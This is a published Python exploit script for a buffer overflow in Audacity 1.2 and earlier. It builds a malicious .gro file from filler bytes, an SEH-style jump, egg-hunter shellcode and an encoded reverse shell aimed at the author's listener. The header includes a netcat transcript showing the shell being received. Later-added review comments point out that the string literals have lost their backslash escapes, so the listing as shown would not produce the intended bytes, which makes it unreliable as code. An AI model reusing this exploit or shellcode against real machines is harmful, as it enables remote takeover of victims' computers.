
# Title : Audacity <= 1.2 (.gro File) Universal BOF Exploit (egg hunter)
# Published : 2009-08-24
# Author : mr_me


#!/usr/bin/env python
#
# Audacity <= 1.2 .gro universal buffer overflow exploit
# Author: mr_me
# Download: http://audacity.sourceforge.net/download/
# Tested on Wind0ws XP sp3 & Vist@
#
# Greetz fly to Muts and the offensive-security team
# also to my wonderful partner Vanessa F for putting up with me :P
# http://www.offensive-security.com/information-security-training.php
#
# Original: www.milw0rm.com/exploits/7634
#################################################
#
# samurai@mrme:~$ nc -lvp 4444
# listening on [any] 4444 ...
# 192.168.2.3: inverse host lookup failed: Unknown server error :
# Connection timed out
# connect to [192.168.2.3] from (UNKNOWN) [192.168.2.3] 55164
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Audacity>

# Flat Python 2 script: assemble one str in `buff`, then write it to a .gro
# file in the current working directory. Everything below runs at import time.
#
# NOTE(review): as rendered on this page the string literals carry no
# backslash escapes ("x44" is three printable characters, not the byte 0x44),
# so the sizes and byte values the author's comments imply cannot be verified
# from this listing; treat them as unverified.
print " [+] Creating eviL .gro file..."

buff = ("x44" * 174)            # filler: 174 repetitions of the literal
buff += ("xEBx08x90x90")
buff += ("x22x23x17x01")
buff += "x90"* 4
buff += ("x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8"
    "x57x30x30x54" # this is the egg...
    "x8BxFAxAFx75xEAxAFx75xE7xFFxE7")
buff += ("xCC" * 1000);        # 1000 repetitions; the trailing ';' is a no-op
buff += "W00TW00T"              # tag appended verbatim; a stable plain string
                                # to key a file-content detection on

# Reverse shellcode to 192.168.2.3 change as you see fit (2000 bytes for space)
# Defender note: the long literal below is an opaque encoded payload; nothing
# on this page identifies its contents beyond the author's description, and
# 192.168.2.3 is the author's own listener from the header transcript.

buff += ("x89xe5xd9xc3xd9x75xf4x5fx57x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx43x5ax4ax4bx50x4dx4bx58x4bx49x4bx4fx4b"
"x4fx4bx4fx45x30x4cx4bx42x4cx46x44x47x54x4cx4b"
"x47x35x47x4cx4cx4bx43x4cx45x55x44x38x45x51x4a"
"x4fx4cx4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51"
"x4ax4bx50x49x4cx4bx50x34x4cx4bx43x31x4ax4ex50"
"x31x49x50x4dx49x4ex4cx4dx54x49x50x44x34x44x47"
"x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4bx44x47"
"x4bx50x54x47x54x46x48x44x35x4bx55x4cx4bx51x4f"
"x51x34x45x51x4ax4bx42x46x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx43x31x4ax4bx45x53x46x4cx4cx4b"
"x4dx59x42x4cx51x34x45x4cx45x31x49x53x46x51x49"
"x4bx45x34x4cx4bx47x33x50x30x4cx4bx51x50x44x4c"
"x4cx4bx44x30x45x4cx4ex4dx4cx4bx51x50x45x58x51"
"x4ex42x48x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4f"
"x4ex36x43x56x50x53x45x36x42x48x46x53x50x32x45"
"x38x43x47x44x33x46x52x51x4fx51x44x4bx4fx48x50"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx4e"
"x36x51x4fx4cx49x4ax45x45x36x4bx31x4ax4dx44x48"
"x45x52x46x35x42x4ax44x42x4bx4fx48x50x45x38x4e"
"x39x45x59x4cx35x4ex4dx51x47x4bx4fx49x46x46x33"
"x51x43x51x43x51x43x50x43x51x43x47x33x51x43x4b"
"x4fx4ex30x42x48x49x50x49x38x45x52x45x53x42x46"
"x42x48x44x51x51x4cx43x56x50x53x4bx39x4dx31x4d"
"x45x43x58x4ax4cx4cx39x4ex4ax43x50x51x47x4bx4f"
"x4ex36x42x4ax42x30x46x31x46x35x4bx4fx48x50x42"
"x46x43x5ax42x44x43x56x42x48x45x33x42x4dx42x4a"
"x46x30x50x59x46x49x48x4cx4bx39x4ax47x43x5ax47"
"x34x4dx59x4bx52x50x31x49x50x4ax53x4ex4ax4ax35"
"x4dx59x4bx4dx4bx4ex50x42x46x4dx4bx4ex50x42x46"
"x4cx4cx4dx42x5ax47x48x4ex4bx4ex4bx4ex4bx45x38"
"x42x52x4bx4ex48x33x42x36x4bx4fx42x55x47x58x4b"
"x4fx49x46x51x4bx51x47x51x42x46x31x50x51x46x31"
"x42x4ax43x31x50x51x50x51x51x45x50x51x4bx4fx4e"
"x30x42x48x4ex4dx4ex39x43x35x48x4ex51x43x4bx4f"
"x48x56x42x4ax4bx4fx4bx4fx47x47x4bx4fx4ex30x42"
"x48x4dx37x43x49x48x46x43x49x4bx4fx42x55x44x44"
"x4bx4fx49x46x4bx4fx43x47x4bx4cx4bx4fx4ex30x43"
"x58x4ax50x4cx4ax45x54x51x4fx50x53x4bx4fx4ex36"
"x4bx4fx48x50x44x4ax41x41")

# Write the assembled string to 'mr_mes_eviL.gro' in the current working
# directory -- this file name is the on-disk artefact to look for.
# Style notes: `file` shadows the Python 2 builtin of the same name, the
# handle is closed by hand rather than with a `with` block, and the file is
# opened in text mode ('w') rather than binary ('wb').
file = open('mr_mes_eviL.gro','w');
file.write(buff);
file.close();

print " [+] mr_mes_eviL.gro File created successfully. :)"
